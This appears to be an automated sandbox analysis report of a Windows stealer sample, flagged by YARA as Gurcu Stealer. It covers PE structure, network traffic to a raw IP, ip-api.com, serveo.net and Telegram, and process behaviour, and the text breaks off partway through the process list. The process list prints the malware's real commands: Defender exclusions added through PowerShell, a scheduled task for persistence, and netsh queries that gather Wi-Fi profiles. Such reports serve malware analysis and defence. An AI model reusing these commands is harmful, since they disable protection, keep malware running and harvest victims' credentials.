                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4cc10x4f.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x59c.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x4c3c0x38.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000x2d1c0x2e006a50215a4de9009c9822c87b3aefe82aFalse0.5207201086956522data5.580839345941778IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x60000x59c0x60032791b53ec0675637a2192fac6511faaFalse0.4166666666666667data4.030670859022482IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x80000xc0x2006136f169555e82248bf6cc07cc9f65ccFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_VERSION0x60900x30cdata0.4358974358974359
                                                                                                    RT_MANIFEST0x63ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain

                                                                                                    Network Behavior

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Feb 10, 2024 16:17:08.365370989 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.642452955 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.642586946 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.643671036 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.921837091 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921875000 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921915054 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921937943 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921937943 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.921962976 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921992064 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.921998024 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.922015905 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.922038078 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.922040939 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.922065973 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.922085047 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:08.922091961 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:08.922133923 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.198327065 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198416948 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198472023 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198520899 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198577881 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198628902 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198632002 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.198632956 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.198682070 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198738098 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198787928 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198803902 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.198803902 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.198865891 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198925018 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.198980093 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199033022 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199038029 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.199038029 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.199084997 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199136972 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199139118 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.199191093 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199239969 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.199240923 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199291945 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199342966 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199343920 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.199394941 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.199445009 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475084066 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475115061 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475151062 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475173950 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475181103 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475197077 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475224972 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475228071 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475249052 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475274086 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475277901 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475301981 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475325108 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475327015 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475348949 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475374937 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475375891 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475399017 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475419998 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475420952 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475449085 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475465059 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475474119 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475497007 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475517035 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475517035 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475543976 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475560904 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475565910 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475589991 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475611925 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475621939 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475636005 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475657940 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475658894 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475682020 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475706100 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475714922 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475728989 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475750923 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475752115 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475775003 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475795984 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475797892 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475821018 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475841045 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475841999 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475867987 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475888014 CET4972980192.168.2.482.147.85.194
                                                                                                    Feb 10, 2024 16:17:09.475891113 CET804972982.147.85.194192.168.2.4
                                                                                                    Feb 10, 2024 16:17:09.475914001 CET804972982.147.85.194192.168.2.4

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Feb 10, 2024 16:17:17.405252934 CET5195453192.168.2.41.1.1.1
                                                                                                    Feb 10, 2024 16:17:17.523276091 CET53519541.1.1.1192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.442881107 CET5880053192.168.2.41.1.1.1
                                                                                                    Feb 10, 2024 16:17:18.678560972 CET53588001.1.1.1192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.532113075 CET5261653192.168.2.41.1.1.1
                                                                                                    Feb 10, 2024 16:17:19.649746895 CET53526161.1.1.1192.168.2.4

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Feb 10, 2024 16:17:17.405252934 CET192.168.2.41.1.1.10xc02bStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                    Feb 10, 2024 16:17:18.442881107 CET192.168.2.41.1.1.10xd06dStandard query (0)serveo.netA (IP address)IN (0x0001)false
                                                                                                    Feb 10, 2024 16:17:19.532113075 CET192.168.2.41.1.1.10xa81fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Feb 10, 2024 16:17:17.523276091 CET1.1.1.1192.168.2.40xc02bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                    Feb 10, 2024 16:17:18.678560972 CET1.1.1.1192.168.2.40xd06dNo error (0)serveo.net138.68.79.95A (IP address)IN (0x0001)false
                                                                                                    Feb 10, 2024 16:17:19.649746895 CET1.1.1.1192.168.2.40xa81fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • api.telegram.org
                                                                                                    • 82.147.85.194
                                                                                                    • ip-api.com

                                                                                                    Statistics

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:16:16:54
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    Imagebase:0x940000
                                                                                                    File size:14'336 bytes
                                                                                                    MD5 hash:7E9A93C69AECFC2BBDA9470FBD4556DB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:16:16:59
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                                                                                                    Imagebase:0x650000
                                                                                                    File size:433'152 bytes
                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:2
                                                                                                    Start time:16:16:59
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:3
                                                                                                    Start time:16:17:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:4
                                                                                                    Start time:16:17:09
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                                                                                                    Imagebase:0x1f995eb0000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:5
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:7
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:8
                                                                                                    Start time:16:17:12
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\timeout.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:timeout /t 3
                                                                                                    Imagebase:0x7ff61b030000
                                                                                                    File size:32'768 bytes
                                                                                                    MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:10
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                                                                                                    Imagebase:0x7ff76f990000
                                                                                                    File size:235'008 bytes
                                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:11
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                                                                                                    Imagebase:0x1b8a9a90000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    General

                                                                                                    Target ID:12
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:13
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:14
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:15
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show profiles
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:16
                                                                                                    Start time:16:17:15
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr /R /C:"[ ]:[ ]"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:17
                                                                                                    Start time:16:17:16
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                                                                                                    Imagebase:0x7ff677710000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
